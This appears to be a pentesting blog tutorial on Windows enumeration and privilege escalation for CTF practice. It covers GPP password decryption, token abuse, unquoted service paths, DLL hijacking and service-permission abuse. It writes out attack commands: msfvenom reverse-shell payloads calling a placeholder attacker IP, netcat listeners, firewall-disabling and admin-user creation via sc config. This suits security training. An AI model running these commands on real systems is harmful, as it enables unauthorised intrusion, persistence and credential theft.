Windows penetration testing is one of the grey area where many beginner penetration testers struggles with. It is irony that most of us use windows for our day-to-day tasks but when it comes to penetration testing, we are more comfortable with Linux. The reason for this disparity in skills is because of the availability of numerous CTFs and resources available for Linux. Since Windows is not open source and it comes with a licensing cost, we see a fewer Windows CTFs for practice. HackTheBox is one ofthe great resource for practicing Windows penetration testing for free. If you are one of those people who fear windows enumeration and privilege escalation, this blog is for you. In this blog we are going to look into Windows penetration testing and also try to draw an analogy with its Linux counterpart wherever possible.
Basic enumeration commands
Since Windows is known for its interactive GUI, its command line is very less utilized. In this section we will look into some basic windows command to kick off our enumeration.
Equivalent to Linux's whoami. Returns the name of currently logged in user
Similar to uname -a
Returns various system information including installed "Hot-fixes". This is particularly important for finding privilege escalation vector
Returns the machine name
List all the directories (including hidden and ADS)
Similar to echo $PATH in linux
Returns the list of environment variables. Similar to env in linux
tree /a /f
Get the list of folders and files in tree structure. Very important command during enumeration phase
Returns the IP address of all the interfaces along with the MAC
Get-Content file.txt (powershell)
Read the file content
Copy the file
del /f filename
Delete the file
findstr /si password *.txt
Search a particular word (e.g. 'password) within the file with particular extension (e.g. txt, ini, xml)
findstr /b /s unattend.xml
Search the location of particular file in current and all sub directories (/s)
Returns the list of users on the system
Information about the user
net localgroup Administrators
Get the list of administrators
Returns the list of groups on the system
Get the list of locally shared drives
net user /add
Add a new user. (make sure password is complex so that it follows password policy if any)
net localgroup administrators/add
Make a user an administrator
Print the routing table
Print the ARP cache. It returns the IP address along with its respective MAC
Returns the network statistics. Look for loopback services and other hosts with which the machine is interacting with
wmic qfe get Caption,Description,HotFixID,InstalledOn
Find the list of installed hot-fixes. Use findstr to identify the missing hot-fixes. e.g. wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4012212" /C:"KB4012215"
sc stop|start ""
Start/Stop the service
NetSh Advfirewall set allprofiles state off (on newer versions)
netsh firewall set opmode disable (on older versions)
Checking each of the above commands manually is tedious and takes lot of time. There is a batch script which automates the enumeration and provides the result in a nice readable format. This script can be downloaded from here. Upload this script on the target machine and run it to automate the enumeration process. There is also a powershell alternative of this script which can be downloaded from here.
This is one of the area where most of the beginner pentesters are afraid off. In this section, we will see some of the basic privilege escalation vectors on Windows machine and different ways to exploit them. Below are list of some common privilege escalation techniques:
Windows OS receives the security updates at regular interval. If the system is not updated, there is a good chance that a critical security patch might be missing. Once we have the list of missing patch, we can use the relevant exploit to escalate our privilege. There are different ways to check for missing patches:
Once we have the meterpreter shell on Windows machine, we can use the post/windows/gather/enum_patches module to enumerate for missing patches.
There is a great powershell script from Rasta Mouse called Sherlock with uses the Microsoft database for list of latest patches and checks if the system has all of them installed. Upload the Sherlock.ps1 file on the target machine and run the check using PowerShell.exe Find-AllVulns.
Windows Exploit Suggester
There is a python script which enumerates the windows machine and suggest the possible exploit. The script can be found here.
Compilation is one of the pain while dealing with Windows kernel exploit. There is an excellent github repositorywhere we can find many pre-compiled windows exploit.
Note: Be extra cautious before using any of these pre-compiled exploits. Using these exploits can be fine for CTFs but for real pentest engagements, it is not advisable.
2. Stored Credentials
Stored credentials can be found at multiple locations like unintended installation (unattend.xml, sysprep.inf, sysprep.xml), configuration files (vnc.ini, ultravnc.ini, web.config), 3rd party softwares (SiteList.xml for McAfee, VNC, Putty) and registry. Below are the few ways to find stored credentials.
This is a collection of various powershell modules to help in different stages of penetration testing. This script can be downloaded from here. Different modules which help to dump the stored credentials are
Once we have the meterpreter shell, we can use the following metasploit modules to dump the stored credentials
This enumeration script mentioned earlier can also enumerate for stored credentials and dump them in a file.
3. Pass The Hash
In windows environment, LM/NTLM hash is used to authenticate to the remote server instead of plain text password. If we have the administrator access on the windows system, we can dump the hash from the memory using the tools like Windows Credential Editor (wce.exe) and fgdump.exe. Both the tools are available in the default Kali installation.
4. Group Policy Preferences (GPP)
This method is applicable for the systems present in Active Directory Domain environment. One of the functionality of Group Policy Preferences is to change the local administrator password of the systems connected to the domain environment. Groups.xmlfile on the domain controller stores the encrypted password. This file is stored at the location \\<DOMAIN>\SYSVOL\. Once we have the decrypted password, we can have local administrator level access on the other systems connected to the domain. Below are the different ways to exploit this issue.
Check if SYSVOL share can be mounted: net use z: \\<DOMAIN>\SYSVOL
Check if Groups.xml file exists: dir /s Groups.xml
Open Groups.xml file and copy the attribute cpassword
Decrypt cpassword using gpp-decrypt utility present in Kali
Use the following Powersploit modules to exploit the gpp
Once we have the meterpreter shell, we can use the post/windows/gather/credentials/gpp post exploitation module to test for vulnerable gpp
5. Token Manipulation
This method is applicable in case when we have compromised a service running as NT AUTHORITY\Network Service. There are various ways to escalate or privilege from Network Service to SYSTEM.
Upload MSFRottenPotato.exe and shell.exe to the victim
Open the netcat listener on the attacker machine: nc -nlvp 443
Execute the exploit to get back the reverse shell: C:\MSFRottenPotato.exe shell.exe * shell.exe
6. Secondary Logon Handle
This exploit requires the Remote Desktop Connection to the victim machine. Check if target is vulnerable
wmic qfe list|find"3139914"
use the following metasploit module to exploit this vulnerability exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Download the powershell exploit script from here and execute the script. This will open a new command prompt with the privilege of “NT AUTHORITY/SYSTEM”.
Download the exploit binary from here and execute it. This will open a new command prompt with the privilege of “NT AUTHORITY/SYSTEM”.
7. Unquoted Service
This method requires the restart of vulnerable service. Below are the different ways to exploit this issue
Find the services running without quotes
Identify the privilege of service running by using services.msc: wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””
Check if the normal user is having write access to the directory where service’s executable is located or in another previous directory. BUILTIN\Users should have RX or Full (F) privilege: icacls “C:\Program Files(x86)\Servicename”
Generate a payload using msfvenom and add the malicious exe in the path: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=AttackerIP LPORT=AttackerPort -f exe -o shell.exe
Open the meterpreter listener on the attacker
Restart the service
Once we have the meterpreter session, use the following command to exploit this vulnerability. If everything goes ok, we will get a new meterpreter session with elevated privilege.
set session[existing meterpreter session number]
set payload windows/meterpreter/reverse_tcp
set LHOST AttackerIP
set LPORT AttackerPort
Get the list of all the unquoted services: Get-ServiceUnquoted
Generate a payload using msfvenom (shell.exe) as mentioned earlier
Replace the existing service with the malicious service to get the shell with administrator privilege: Write-ServiceBinary -Name “ServiceName from above command” -Path “Path\adduser.exe”
Create a malicious dll using msfvenom (payload.dll)
Upload the malicious dll
Inject the malicious dll to the vulnerable process using: RemoteDLLInjector64.exe 1234 C:\payload.dll
Use the metasploit post/windows/manage/reflective_dll_inject post exploitation module to escalate the privilege.
12. DLL Hijacking
This vulnerability exploits the weak permissions on the folders. If a vulnerable service is running with administrator privilege, a dll of the service can be replaced with the malicious dll to escalate the privilege. Before exploiting this issue, we need to know the order in which dll path is searched before getting loaded. This will help us to take the decision regarding where to place our malicious dll payload. Below is the order in which the dlls are loaded:
C:\Windows\System32 (System directory)
C:\Windows\System (16-bit System directory)
Current working directory
System PATH environment variables
User PATH environment variables
Look for the non-default directory in the “C:\” folder
Look for non-default directories in PATH environment variable and check for the write access to the folder
Use the tool process monitor to look for the process with missing dll. Create a reverse shell dll and place it in the appropriate directory as mentioned above.
//Createamalicious dll andplace it inthe writable directory
Note: A restart of vulnerable service is required to execute the malicious dll
13. Weak/insecure Service Permission
If the low privileged user has the write permission to the directories where application executable are stored, the genuine binaries can be replaced with the malicious executable files and it will lead to escalation of privileges if the service is running as administrator. Below are the different ways to exploit this issue
Use accesschk.exe to list all the services that a particular user can modify. Look for “SERVICE_ALL_ACCESS” permissions
Check the status of the service. Look for “SERVICE_START_NAME : LocalSystem” and “BINARY_PATH_NAME”
Modify the service to create a new user and add it to local administrator group
sc config"ServiceName"binpath="net user roguesecurity Rogu3Security! /add"
//Modify the service andaddanewuser"john"with password asPassword123!andrestart the service
If the user has write permission into the folder where the binary of the service is located, then it is possible to just replace the binary with the a custom payload and then restart the service in order to escalate privileges.
//Getthe full list of modifiable services running with the permissions
//Createabinary toaddauser"john"with password"Password123!"tolocal administrator group
If we have a meterpreter session, we can use the metasploit post exploitation module exploit/windows/local/service_permissions to automatically exploit this vulnerability and escalate our privilege.
14. Insecure File/Folder Permissions
Look for files and folders for full access (F). Use ‘M’ for modify access.
People coming from Linux background often face difficulty in executing basic tasks in Windows environment like file transfer and reverse shell. Windows is completely different environment and we don’t have the luxury of rich Linux utilities like wget, curl, python etc. In this section we will look into some common utilities and tasks which people frequently face during their pentest engagements.
Windows payload generation
.aspx payload. meterpreter listener required on attacker side msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerIP LPORT=attackerPort -f aspx
.exe non staged payload for 64-bit system. nc listener required on attacker side msfvenom -p windows/x64/shell_reverse_tcp LHOST=attackerIP LPORT=attackerPort -f exe -a x64 -o shell.exe
.exe payload for 32-bit system. meterpreter listener required on attacker side msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=attackerIP LPORT=attackerPort -f exe -o shell.exe
.msi payload which will execute a reverse shell executable (shell.exe) msfvenom -p windows/exec cmd=”C:\Users\testuser\AppData\Local\Temp\shell.exe” -f msi-nouac -o payload.msi
.msi payload which will add a new user msfvenom -f msi-nouac -p windows/adduser USER=<username> PASS=<password> -o payload.msi
.dll payload for 64-bit system. meterpreter listener required on attacker side msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attackerIP LPORT=attackerPort -f dll -o shell.dll
If ftp client is available on the windows machine, attacker machine can open a ftp server for file transfer. Use the following command to transfer the file. Modify the attackerIP, attackerPort, filename, attackerUsername and attackerPassword to the desired value.
Create a SMB server on attacker machine. Download the script from here. Run the script by providing the share name and share directory.